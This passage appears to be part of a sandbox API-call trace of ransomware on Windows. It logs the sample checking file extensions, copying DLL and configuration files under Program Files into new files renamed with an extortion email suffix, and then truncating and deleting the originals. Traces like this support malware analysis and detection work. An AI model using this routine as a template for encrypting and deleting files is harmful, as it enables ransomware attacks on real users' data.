DB\\msdaosp.dll") returned 55 [0184.884] lstrlenW (lpString=".jpg") returned 4 [0184.884] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.885] lstrlenW (lpString=".doc") returned 4 [0184.885] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.885] lstrlenW (lpString=".docx") returned 5 [0184.885] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0184.885] lstrlenW (lpString=".pdf") returned 4 [0184.885] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.885] lstrlenW (lpString=".xls") returned 4 [0184.885] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.885] lstrlenW (lpString=".xlsx") returned 5 [0184.885] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0184.885] lstrlenW (lpString=".ppt") returned 4 [0184.885] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.885] lstrlenW (lpString=".zip") returned 4 [0184.885] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.885] lstrlenW (lpString=".rar") returned 4 [0184.885] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.885] lstrlenW (lpString=".bz2") returned 4 [0184.885] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.885] lstrlenW (lpString=".7z") returned 3 [0184.885] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.885] lstrlenW (lpString=".dbf") returned 4 [0184.885] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.885] lstrlenW (lpString=".1cd") returned 4 [0184.885] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 55 [0184.885] lstrlenW (lpString=".jpg") returned 4 [0184.885] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.885] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.886] lstrlenW (lpString="msdaps.dll") returned 10 [0184.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.886] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=376320) returned 1 [0184.886] CloseHandle (hObject=0x374) returned 1 [0184.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll")) returned 0x20 [0184.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.886] lstrlenW (lpString=".doc") returned 4 [0184.887] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.887] lstrlenW (lpString=".docx") returned 5 [0184.887] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0184.887] lstrlenW (lpString=".pdf") returned 4 [0184.887] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.887] lstrlenW (lpString=".xls") returned 4 [0184.887] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.887] lstrlenW (lpString=".xlsx") returned 5 [0184.887] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0184.887] lstrlenW (lpString=".ppt") returned 4 [0184.887] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.887] lstrlenW (lpString=".zip") returned 4 [0184.887] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.887] lstrlenW (lpString=".rar") returned 4 [0184.887] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.887] lstrlenW (lpString=".bz2") returned 4 [0184.887] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.887] lstrlenW (lpString=".7z") returned 3 [0184.887] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.887] lstrlenW (lpString=".dbf") returned 4 [0184.887] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.887] lstrlenW (lpString=".1cd") returned 4 [0184.887] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.887] lstrlenW (lpString=".jpg") returned 4 [0184.887] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.888] lstrlenW (lpString=".doc") returned 4 [0184.888] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.888] lstrlenW (lpString=".docx") returned 5 [0184.888] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0184.888] lstrlenW (lpString=".pdf") returned 4 [0184.888] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.888] lstrlenW (lpString=".xls") returned 4 [0184.888] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.888] lstrlenW (lpString=".xlsx") returned 5 [0184.888] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0184.888] lstrlenW (lpString=".ppt") returned 4 [0184.888] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.888] lstrlenW (lpString=".zip") returned 4 [0184.888] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.888] lstrlenW (lpString=".rar") returned 4 [0184.888] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.888] lstrlenW (lpString=".bz2") returned 4 [0184.888] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.888] lstrlenW (lpString=".7z") returned 3 [0184.888] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.888] lstrlenW (lpString=".dbf") returned 4 [0184.889] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.889] lstrlenW (lpString=".1cd") returned 4 [0184.889] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 54 [0184.889] lstrlenW (lpString=".jpg") returned 4 [0184.889] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.889] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.889] lstrlenW (lpString="msdasql.dll") returned 11 [0184.889] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.889] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=698368) returned 1 [0184.889] CloseHandle (hObject=0x374) returned 1 [0184.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll")) returned 0x20 [0184.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 55 [0184.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 55 [0184.890] lstrlenW (lpString=".doc") returned 4 [0184.890] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.890] lstrlenW (lpString=".docx") returned 5 [0184.890] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0184.890] lstrlenW (lpString=".pdf") returned 4 [0184.890] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.890] lstrlenW (lpString=".xls") returned 4 [0184.890] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.890] lstrlenW (lpString=".xlsx") returned 5 [0184.890] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0184.890] lstrlenW (lpString=".ppt") returned 4 [0184.890] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 55 [0184.890] lstrlenW (lpString=".zip") returned 4 [0184.890] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.890] lstrlenW (lpString=".rar") returned 4 [0184.890] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.890] lstrlenW (lpString=".bz2") returned 4 [0184.890] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.890] lstrlenW (lpString=".7z") returned 3 [0184.890] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 55 [0184.890] lstrlenW (lpString=".dbf") returned 4 [0184.890] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.895] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.895] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.895] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0184.896] GetLastError () returned 0x0 [0184.896] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x1c4, lpOverlapped=0x0) returned 1 [0185.338] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x1d0, lpOverlapped=0x0) returned 1 [0185.339] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.339] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xea, lpOverlapped=0x0) returned 1 [0188.010] SetEndOfFile (hFile=0x398) returned 1 [0188.011] CloseHandle (hObject=0x398) returned 1 [0188.011] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.012] SetEndOfFile (hFile=0x374) returned 1 [0188.023] CloseHandle (hObject=0x374) returned 1 [0188.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0188.023] DeleteFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins")) returned 1 [0188.024] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.024] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.024] lstrlenW (lpString=".doc") returned 4 [0188.024] lstrcmpiW (lpString1=".doc", lpString2=".ins") returned -1 [0188.024] lstrlenW (lpString=".docx") returned 5 [0188.024] lstrcmpiW (lpString1=".docx", lpString2="l.ins") returned -1 [0188.024] lstrlenW (lpString=".pdf") returned 4 [0188.024] lstrcmpiW (lpString1=".pdf", lpString2=".ins") returned 1 [0188.024] lstrlenW (lpString=".xls") returned 4 [0188.024] lstrcmpiW (lpString1=".xls", lpString2=".ins") returned 1 [0188.024] lstrlenW (lpString=".xlsx") returned 5 [0188.024] lstrcmpiW (lpString1=".xlsx", lpString2="l.ins") returned -1 [0188.024] lstrlenW (lpString=".ppt") returned 4 [0188.024] lstrcmpiW (lpString1=".ppt", lpString2=".ins") returned 1 [0188.024] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.024] lstrlenW (lpString=".zip") returned 4 [0188.024] lstrcmpiW (lpString1=".zip", lpString2=".ins") returned 1 [0188.024] lstrlenW (lpString=".rar") returned 4 [0188.024] lstrcmpiW (lpString1=".rar", lpString2=".ins") returned 1 [0188.024] lstrlenW (lpString=".bz2") returned 4 [0188.024] lstrcmpiW (lpString1=".bz2", lpString2=".ins") returned -1 [0188.024] lstrlenW (lpString=".7z") returned 3 [0188.024] lstrcmpiW (lpString1=".7z", lpString2="ins") returned -1 [0188.024] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.024] lstrlenW (lpString=".dbf") returned 4 [0188.024] lstrcmpiW (lpString1=".dbf", lpString2=".ins") returned -1 [0188.024] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.024] lstrlenW (lpString=".1cd") returned 4 [0188.024] lstrcmpiW (lpString1=".1cd", lpString2=".ins") returned -1 [0188.025] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.025] lstrlenW (lpString=".jpg") returned 4 [0188.025] lstrcmpiW (lpString1=".jpg", lpString2=".ins") returned 1 [0188.025] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.025] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.025] lstrlenW (lpString=".doc") returned 4 [0188.025] lstrcmpiW (lpString1=".doc", lpString2=".ins") returned -1 [0188.025] lstrlenW (lpString=".docx") returned 5 [0188.025] lstrcmpiW (lpString1=".docx", lpString2="l.ins") returned -1 [0188.025] lstrlenW (lpString=".pdf") returned 4 [0188.025] lstrcmpiW (lpString1=".pdf", lpString2=".ins") returned 1 [0188.025] lstrlenW (lpString=".xls") returned 4 [0188.025] lstrcmpiW (lpString1=".xls", lpString2=".ins") returned 1 [0188.025] lstrlenW (lpString=".xlsx") returned 5 [0188.025] lstrcmpiW (lpString1=".xlsx", lpString2="l.ins") returned -1 [0188.025] lstrlenW (lpString=".ppt") returned 4 [0188.025] lstrcmpiW (lpString1=".ppt", lpString2=".ins") returned 1 [0188.025] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.025] lstrlenW (lpString=".zip") returned 4 [0188.025] lstrcmpiW (lpString1=".zip", lpString2=".ins") returned 1 [0188.025] lstrlenW (lpString=".rar") returned 4 [0188.025] lstrcmpiW (lpString1=".rar", lpString2=".ins") returned 1 [0188.025] lstrlenW (lpString=".bz2") returned 4 [0188.025] lstrcmpiW (lpString1=".bz2", lpString2=".ins") returned -1 [0188.025] lstrlenW (lpString=".7z") returned 3 [0188.025] lstrcmpiW (lpString1=".7z", lpString2="ins") returned -1 [0188.025] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.025] lstrlenW (lpString=".dbf") returned 4 [0188.026] lstrcmpiW (lpString1=".dbf", lpString2=".ins") returned -1 [0188.026] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.026] lstrlenW (lpString=".1cd") returned 4 [0188.026] lstrcmpiW (lpString1=".1cd", lpString2=".ins") returned -1 [0188.026] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 53 [0188.026] lstrlenW (lpString=".jpg") returned 4 [0188.026] lstrcmpiW (lpString1=".jpg", lpString2=".ins") returned 1 [0188.026] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0188.026] lstrlenW (lpString="deploy.dll") returned 10 [0188.026] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0188.027] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=587840) returned 1 [0188.027] CloseHandle (hObject=0x374) returned 1 [0188.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll")) returned 0x20 [0188.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0188.027] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0188.027] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.027] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.027] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0188.028] GetLastError () returned 0x0 [0188.028] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x8f840, lpOverlapped=0x0) returned 1 [0189.650] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x8f850, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x8f850, lpOverlapped=0x0) returned 1 [0189.661] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0189.661] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe8, lpOverlapped=0x0) returned 1 [0189.661] SetEndOfFile (hFile=0x398) returned 1 [0189.661] CloseHandle (hObject=0x398) returned 1 [0189.662] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.662] SetEndOfFile (hFile=0x374) returned 1 [0189.668] CloseHandle (hObject=0x374) returned 1 [0189.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0189.668] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\deploy.dll")) returned 1 [0189.668] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.668] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.668] lstrlenW (lpString=".doc") returned 4 [0189.668] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.668] lstrlenW (lpString=".docx") returned 5 [0189.668] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1 [0189.668] lstrlenW (lpString=".pdf") returned 4 [0189.669] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.669] lstrlenW (lpString=".xls") returned 4 [0189.669] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.669] lstrlenW (lpString=".xlsx") returned 5 [0189.669] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1 [0189.669] lstrlenW (lpString=".ppt") returned 4 [0189.669] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.669] lstrlenW (lpString=".zip") returned 4 [0189.669] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.669] lstrlenW (lpString=".rar") returned 4 [0189.669] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.669] lstrlenW (lpString=".bz2") returned 4 [0189.669] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.669] lstrlenW (lpString=".7z") returned 3 [0189.669] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.669] lstrlenW (lpString=".dbf") returned 4 [0189.669] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.669] lstrlenW (lpString=".1cd") returned 4 [0189.669] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.669] lstrlenW (lpString=".jpg") returned 4 [0189.669] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.669] lstrlenW (lpString=".doc") returned 4 [0189.669] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.669] lstrlenW (lpString=".docx") returned 5 [0189.670] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1 [0189.670] lstrlenW (lpString=".pdf") returned 4 [0189.670] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.670] lstrlenW (lpString=".xls") returned 4 [0189.670] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.670] lstrlenW (lpString=".xlsx") returned 5 [0189.670] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1 [0189.670] lstrlenW (lpString=".ppt") returned 4 [0189.670] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.670] lstrlenW (lpString=".zip") returned 4 [0189.670] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.670] lstrlenW (lpString=".rar") returned 4 [0189.670] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.670] lstrlenW (lpString=".bz2") returned 4 [0189.670] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.670] lstrlenW (lpString=".7z") returned 3 [0189.670] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.670] lstrlenW (lpString=".dbf") returned 4 [0189.670] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.670] lstrlenW (lpString=".1cd") returned 4 [0189.670] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\deploy.dll") returned 49 [0189.670] lstrlenW (lpString=".jpg") returned 4 [0189.670] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.671] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0189.671] lstrlenW (lpString="dt_socket.dll") returned 13 [0189.671] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0189.672] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=24640) returned 1 [0189.672] CloseHandle (hObject=0x374) returned 1 [0189.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll")) returned 0x20 [0189.672] GetFileAttributesW (lpFileName="C:\\Program 